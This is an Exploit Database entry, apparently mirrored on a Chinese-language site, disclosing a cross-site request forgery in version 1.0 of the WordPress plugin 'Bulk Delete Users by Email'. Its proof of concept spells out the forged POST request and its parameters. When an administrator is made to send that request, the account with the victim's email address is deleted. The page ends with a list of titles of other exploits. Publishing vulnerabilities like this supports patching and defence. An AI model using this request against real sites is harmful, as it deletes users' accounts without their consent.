WordPress Plugin Bulk Delete Users by Email 1.0 – Cross-Site Request Forgery

Exploit Database
32 阅读

作者： Fikri Fadzil

日期： 2014-09-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/34572/

# Exploit Title: Bulk Delete Users by Email, WordPress Plugin 1.0 - CSRF
# Google Dork: N/A
# Date: 05.09.2014
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
# Vendor Homepage - http://www.speakdigital.co.uk/
# Software Link: https://wordpress.org/plugins/bulk-delete-users-by-email/
# Version: 1.0
# Tested on: PHP


Description:
This plugin will allow administrator to delete user(s) account by entering
their email address.

Proof of Concept
1. Force the administrator to send below request:

URL :
http://localhost/blog/wp-admin/admin.php?page=bulk-delete-users-by-email/plugin.php
METHOD : POST
REQUEST : de-text=<victim email>&submit=Search+and+Delete

* As the result, user with the given email address will be deleted.

last Exploits
WordPress Plugin Bulk Delete Users by Email 1.0 – Cross-Site Request Forgery的更多信息

PHP Chat for 123 Flash Chat – Remote File Inclusion：
User Management System 2.0 – Authentication Bypass：
PHP4dvd – ‘config.php’ PHP Code Injection：
Bus Pass Management System 1.0 – ‘Search’ SQL injection：
Tiki Wiki CMS Groupware 8.3 – ‘Unserialize()’ PHP Code Execution：
KubeLance 1.7.6 – Cross-Site Request Forgery (Add Admin)：
pointter PHP content management system 1.2 – Multiple Vulnerabilities：
WikLink 0.1.3 – ‘getURL.php’ SQL Injection：